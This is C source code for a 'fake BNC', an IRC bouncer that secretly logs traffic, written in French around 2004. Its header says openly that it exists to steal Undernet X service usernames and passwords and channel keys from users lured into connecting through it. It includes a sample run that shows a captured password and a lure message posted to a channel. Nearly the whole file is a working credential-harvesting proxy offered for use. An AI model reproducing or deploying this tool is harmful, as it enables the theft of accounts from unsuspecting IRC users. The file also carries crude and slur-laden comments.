________________________________________________________________ ____ __ __ / ___________________________________________________________ ____ __ _ / ` \ / \[O9]/ + ,\_____ ___/ . ` |\/ , \__/ . \____ /:/=[ Un affaire de fake-bnc ] =\:\ _____/ ` x || , . " :X \_______________________________ ____ ____ / , ` ` || + , () . x , . ` ' ` \_ \ ,\\_ +\_ \ 'M ` | . || ` | ` , ` , + , ` ,--, + . \\_ \_ \ , \\_ K -+- / |+ -+- . , ` , ,',/ ,'. \_ \ . \\_ \_ \ - | ` / . | ; + + . ` | : . :`` ,_): ' ` \\_ \_ \ \\_` 1 , / ` . . x , .-=+=- `. ,. ,' ` , \_ \ + \\_` \_ \ 1 /\_____ x ' , . . X | ` `--' ` ` \\_ \_ \ , \\_ 1 + \\_ \___________________ , . . ` , + ' , , ; x ._\ \___\\___\ \ . \_ \ \__________________________________/ \ ` , \\_ /:/=[ Aka: ]=\:\ \ \__\__________________________________________ ______________________________ \` \__\ /__/ \\_ /:/=[ phawnky ]=\:\ _// \__\________________________/__/ /* Fake BNC - MKD - phawnky - 2k4 J'ai cree se soft a la demande d'un gars (no shit! juree la...) qui voulait piquer des cservices users/pass et, en bonus, des chans keys. En bref, le code redirect une connection a IRCBNC (defined) et output les trucs interessant qui se passe. J'ai compiler/tester le code et il est 100% fonctionel sous: -Win98 (Avec cygwin) -WinXP sp2 (Avec cygwin) -freebsd 4.x Exemple d'utilisation: ---------------------- @@@@@@@@@@@@@@@@[ irc ]@@@@@@@@@@@@@@@@ (3.56p) wasting your life away in #KKK Hi! can someone test my BNC @ iam.leet.as.fuck.kr port 3000 ? @@@@@@@@@@@@@@@@[ box ]@@@@@@@@@@@@@@@@ <-Funky@-> ./mkd-fbnc 3000 ------------------------------- [MKD] - FakeBNC - phawnky - 2k4 ------------------------------- [+] Listening on port 3000... [+] Incoming connection from: 64.57.75.131 [+] Successfully connected to 216.152.77.10:6667 [+] NICK MuMMy [+] USER tested "64.57.75.131" "iam.leet.as.fuck.kr" I've lost my friends today. [+] Joined chan #KKK [+] X Username: mummy [+] X Passowrd: 1fUKiNg1 [+] Connection Terminated. ^C @@@@@@@@@@@@@@@@[ irc ]@@@@@@@@@@@@@@@@ looking good kthxbye */ #include #include #include #include #include #include #include #include #define LOGF "./fbnc.log" #define IRCBNC "216.152.77.10" #define IRCBNC_PORT 6667 // Prototype void usage(char *); // lemure void banner(void); // Show off int monitor(int, char *, int); // wo0t void infograbber(char *); // Big brother void stripshit(char *, int); // lazy void logshit(char *, char *, char *); int main(int argc, char *argv[]) { int sockfd, newsockfd, portno, clilen; struct sockaddr_in serv_addr, cli_addr; int yes=1; if (argc < 2) { usage(argv[0]); exit(-1); } banner(); sockfd = socket(AF_INET, SOCK_STREAM, 0); if (sockfd < 0) { perror("Socket() "); exit(-1); } // Recycler c'est bien, les femmes hippy aime ca, et j'aimes les femmes. if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes,sizeof(int)) == -1) { perror("setsockopt"); exit(1); } portno = atoi(argv[1]); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = INADDR_ANY; serv_addr.sin_port = htons(portno); if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) { perror("Bind() "); exit(-1); } listen(sockfd,5); clilen = sizeof(cli_addr); printf("[+] Listening on port %d...\n", portno); while(newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen)) { // 1st, L'ip. printf("[+] Incoming connection from: %s\n", inet_ntoa(cli_addr.sin_addr)); logshit(LOGF, "\n[+] - New session Started - [+]\n" "IP: %s\n", (char *) inet_ntoa(cli_addr.sin_addr)); monitor(newsockfd, IRCBNC, IRCBNC_PORT); logshit(LOGF, "[+] - %s Hung up - [+]", (char *) inet_ntoa(cli_addr.sin_addr)); // Closing Socket close(newsockfd); } return 0; } void usage(char *progname) { banner(); printf("Usage: %s portnum\n\n", progname); } void banner(void) { printf("-------------------------------\n" "[MKD] - FakeBNC - phawnky - 2k4\n" "-------------------------------\n\n"); } void logshit(char *fname, char *fmt, char *s) { FILE *log; log = fopen(fname, "a+"); if (!log) { perror("fopen() "); exit(-1); } fprintf(log, fmt, s); fclose(log); } void stripshit(char *s, int sz) { int i, j; for(i=j=0; i < sz; i++) if(s[i] != ':') s[j++] = s[i]; s[j] = 0x00; } int monitor(int sock, char *server, int port) { struct sockaddr_in sin; int rsock; char buf[255]; fd_set rfds; int len; FD_ZERO(&rfds); sin.sin_family = AF_INET; sin.sin_port = htons(IRCBNC_PORT); sin.sin_addr.s_addr = inet_addr(IRCBNC); rsock = socket(AF_INET, SOCK_STREAM, 0); if (rsock < 0 || (connect(rsock, (struct sockaddr *) &sin, sizeof(sin))) < 0) { perror("[-] connect()"); return; } printf("[+] Successfully connected to %s:%d\n", server, port); while(1) { FD_SET(sock, &rfds); FD_SET(rsock, &rfds); if (select(rsock+1, &rfds, 0x00, 0x00, 0x00) == -1) { perror("[-] Select()"); exit(-1); } bzero(buf, sizeof(buf)); // Passoire a truc interessant + forwarding if (FD_ISSET(sock, &rfds)) { // Le sucker send du stuck if (len = recv(sock, buf, sizeof(buf)-1, 0) < 0) { // Le sucker a dropper close(rsock); break; } if(strlen(buf)) infograbber(buf); // Filtrage et/ou modifications if(len = send(rsock, buf, strlen(buf), 0) < 0) { close(rsock); break; } } bzero(buf, sizeof(buf)); if(FD_ISSET(rsock, &rfds)) { // Le serveur a sender du data if (len = recv(rsock, buf, sizeof(buf)-1, 0) < 0) { // Le serveur est mouru close(rsock); break; } if (len = send(sock, buf, strlen(buf), 0) < 0) { // Le sucker a dropper close(rsock); break; } } } printf("[+] Connection Terminated.\n"); return 0; } void infograbber(char *buf) { char *bkp; char *ptr; char *tmp; char chan[255], chanpass[255], tmpbuf[510]; // Commande NICK? bkp = strdup(buf); ptr = strstr(bkp, "NICK"); if (ptr) { strtok(ptr, "\n"); stripshit(ptr, strlen(ptr)); printf("[+] %s\n", ptr); logshit(LOGF, "%s\n", ptr); } // Commande USER? free(bkp); bkp = strdup(buf); ptr = strstr(bkp, "USER"); if(ptr) { strtok(ptr, "\n"); stripshit(ptr, strlen(ptr)); printf("[+] %s\n", ptr); logshit(LOGF, "%s\n", ptr); } // Commande JOIN? free(bkp); bkp = strdup(buf); ptr = strstr(bkp, "JOIN"); if(ptr) { for(tmp = strtok(ptr, "\n"); tmp; tmp = strtok(0x00, "\n")) { stripshit(tmp, strlen(tmp)); if(sscanf(tmp, "%s %s %s", tmpbuf, chan, chanpass) == 3) { printf("[+] Joined chan %s Using pass: %s\n", chan, chanpass); snprintf(tmpbuf, sizeof(tmpbuf)-1, "Joined chan %s Using pass: %s\n", chan, chanpass); logshit(LOGF, "%s", tmpbuf); } else { printf("[+] Joined chan %s\n", chan); logshit(LOGF, "Joined chan %s\n", chan); } } } // Commande join? (Mirc est gay et send ca en lowercase) free(bkp); bkp = strdup(buf); ptr = strstr(bkp, "join"); if(ptr) { for(tmp = strtok(ptr, "\n"); tmp; tmp = strtok(0x00, "\n")) { stripshit(tmp, strlen(tmp)); if(sscanf(tmp, "%s %s %s", tmpbuf, chan, chanpass) == 3) { printf("[+] Joined chan %s Using pass: %s\n", chan, chanpass); snprintf(tmpbuf, sizeof(tmpbuf)-1, "Joined chan %s Using pass: %s\n", chan, chanpass); logshit(LOGF, "%s", tmpbuf); } else { printf("[+] Joined chan %s\n", chan); logshit(LOGF, "Joined chan %s\n", chan); } } } // Le but premier. //PRIVMSG x@channels.undernet.org :login USER PASS\n free(bkp); bkp = strdup(buf); ptr = strstr(bkp, "PRIVMSG x@channels.undernet.org"); if(ptr) { // OMG! tmp = strtok(ptr, ":"); // PRIVMSG x@channels.undernet.org tmp = strtok(0x00, " "); // login tmp = strtok(0x00, " "); // USER printf("[+] X Username: %s\n", tmp); logshit(LOGF, "X Username: %s\n", tmp); tmp = strtok(0x00, "\n"); // PASS printf("[+] X Passowrd: %s\n", tmp); logshit(LOGF, "X Passowrd: %s\n", tmp); } free(bkp); }